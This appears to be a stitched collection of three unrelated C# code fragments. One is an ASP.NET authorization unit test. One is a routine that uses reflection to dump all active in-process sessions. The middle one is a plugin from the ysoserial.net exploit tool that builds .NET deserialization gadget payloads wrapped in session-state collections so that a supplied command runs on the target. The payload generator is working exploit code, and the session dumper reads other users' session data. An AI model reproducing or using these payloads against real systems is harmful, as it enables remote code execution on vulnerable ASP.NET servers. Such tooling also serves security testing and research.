public void AuthorizationAttribute_Test() { var sessionItems = new System.Web.SessionState.SessionStateItemCollection(); var controllerContext = new FakeControllerContext(TestHelper.Resolve<TopicsController>(), "http://localhost", null, null, new System.Collections.Specialized.NameValueCollection(), new System.Collections.Specialized.NameValueCollection(), new System.Web.HttpCookieCollection(), sessionItems); var context = new AuthorizationContext(controllerContext, new FakeActionDescriptor()); var att = new RequireAuthorizationAttribute(UserRole.Member); att.Routes.Add(new StrictRoute("login", new MvcRouteHandler()) { Url = "login", Defaults = new System.Web.Routing.RouteValueDictionary(new { controller = "Authentication", action = "Login" }) }); context.Result = null; att.OnAuthorization(context); Assert.IsInstanceOfType(context.Result, typeof(RedirectResult)); //Test with user User user = ServicesTests.GetTestUser(); sessionItems["User"] = new UserState(user, AuthenticationProvider.Facebook); context.Result = null; att.OnAuthorization(context); Assert.IsNull(context.Result); }
public object Run(string[] args) { InputArgs inputArgs = new InputArgs(); List <string> extra; try { extra = options.Parse(args); inputArgs.Cmd = command; inputArgs.Minify = minify; inputArgs.UseSimpleType = useSimpleType; inputArgs.Test = test; } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } object payload = ""; if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } if (mode.ToLower().Equals("sessionstateitemcollection")) { /* I decided to change the TypeConfuseDelegateGenerator class and use its gadget instead of doing this through the following hacky way */ /* hacky way begin * byte[] tempPayload_init = (byte[])new TypeConfuseDelegateGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); * byte[] tempPayload = new byte[tempPayload_init.Length + 1]; // adding one byte initially to fix the length problem * tempPayload_init.CopyTo(tempPayload, 0); * System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection(); * items[""] = tempPayload; * MemoryStream stream = new MemoryStream(); * BinaryWriter writer = new BinaryWriter(stream); * items.Serialize(writer); * stream.Flush(); * tempPayload = stream.ToArray(); * byte[] newSerializedData = new byte[tempPayload.Length-27-1-1]; // yes don't ask about the numbers! it's magical! * Array.Copy(tempPayload, 0, newSerializedData, 0, 9); // reading first 9 bytes * Array.Copy(tempPayload, 36, newSerializedData, 9, tempPayload.Length-27-1-9-1); // ignoring 27 bytes after 9 bytes + reading the rest + ignoring the last byte * newSerializedData[13] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream * // hacky way ends */ /* here it is using the sane way! */ object serializedData = (object)TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs); System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection(); items[""] = serializedData; MemoryStream stream = new MemoryStream(); BinaryWriter writer = new BinaryWriter(stream); items.Serialize(writer); stream.Flush(); payload = stream.ToArray(); if (test) { // PoC on how it works in practice stream = new MemoryStream((byte[])payload); BinaryReader binReader = new BinaryReader(stream); System.Web.SessionState.SessionStateItemCollection test = System.Web.SessionState.SessionStateItemCollection.Deserialize(binReader); test.GetEnumerator(); } } else { // HttpStaticObjectsCollection byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte serializedData.CopyTo(newSerializedData, 7); newSerializedData[0] = 1; // for ReadInt32 newSerializedData[5] = 1; // for ReadBoolean newSerializedData[6] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream payload = newSerializedData; if (test) { // PoC on how it works in practice try { MemoryStream stream = new MemoryStream((byte[])payload); BinaryReader binReader = new BinaryReader(stream); System.Web.HttpStaticObjectsCollection test = System.Web.HttpStaticObjectsCollection.Deserialize(binReader); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } } return(payload); }
GetActiveSessions(System.Web.HttpContext context) { // Dictionary(Of String, Object) 'List(Of SessionStateItemCollection) // Dim lsSessionStates As New List(Of SessionStateItemCollection) // int strLcId = System.Web.HttpContext.Current.Session.LCID; // string strSeId = System.Web.HttpContext.Current.Session.SessionID; // System.Console.WriteLine(strLcId); // System.Console.WriteLine(strSeId); System.Collections.Generic.Dictionary <string, System.Collections.Generic.Dictionary <string, object> > dictAllSession = new System.Collections.Generic .Dictionary <string, System.Collections.Generic.Dictionary <string, object> >(); //System.Web.Caching.CacheMultiple object obj = typeof(System.Web.HttpRuntime) .GetProperty("CacheInternal", BindingFlags.NonPublic | BindingFlags.Static) .GetValue(null, null); // List(Of System.Web.Caching.CacheSingle) object[] obj2 = (object[])obj.GetType().GetField("_caches", BindingFlags.NonPublic | BindingFlags.Instance) .GetValue(obj); System.Collections.Generic.Dictionary <string, string> tD = KeyValuePairs(context); for (int i = 0; i < obj2.Length; i++) { System.Collections.Hashtable c2 = (System.Collections.Hashtable)obj2[i].GetType() .GetField("_entries", BindingFlags.NonPublic | BindingFlags.Instance) .GetValue(obj2[i]); System.Collections.Generic.Dictionary <string, object> dictSession = new System.Collections.Generic.Dictionary <string, object>(); string strSessionId = null; foreach (System.Collections.DictionaryEntry entry in c2) { object o1 = entry.Value.GetType().GetProperty("Value", BindingFlags.NonPublic | BindingFlags.Instance) .GetValue(entry.Value, null); if (o1.GetType().ToString() == "System.Web.SessionState.InProcSessionState") { System.Web.SessionState.SessionStateItemCollection sess = (System.Web.SessionState.SessionStateItemCollection) o1.GetType().GetField("_sessionItems", BindingFlags.NonPublic | BindingFlags.Instance) .GetValue(o1); if (sess != null) { // yield Return sess // lsSessionStates.Add(sess) System.Type tKeyType = entry.Key.GetType(); // System.Reflection.PropertyInfo[] pis = tKeyType.GetProperties(BindingFlags.NonPublic | BindingFlags.Instance); // System.Reflection.FieldInfo[] fis = tKeyType.GetFields(BindingFlags.NonPublic | BindingFlags.Instance); // System.Reflection.FieldInfo fi = tKeyType.GetField("Key"); System.Reflection.PropertyInfo pi = tKeyType.GetProperty("Key", BindingFlags.NonPublic | BindingFlags.Instance); if (pi != null) { strSessionId = System.Convert.ToString(pi.GetValue(entry.Key, null)); } // string str = (string) entry.Key.GetType().GetProperty("Key").GetValue(entry.Key, null); for (int tC = 0; tC <= sess.Keys.Count - 1; tC++) { if (tD.ContainsKey(sess.Keys[tC])) { sess[sess.Keys[tC]] = tD[sess.Keys[tC]]; } } foreach (string tKey in sess.Keys) { // dictSession.Add(i.ToString() + "-" + tKey, sess[tKey]); ' WTF ??? dictSession[tKey] = sess[tKey]; } } } } if (string.IsNullOrEmpty(strSessionId)) { strSessionId = i.ToString(); } else { strSessionId = i.ToString() + ": " + strSessionId; } dictAllSession.Add(strSessionId, dictSession); } return(dictAllSession); // dictSession 'lsSessionStates } // GetActiveSessions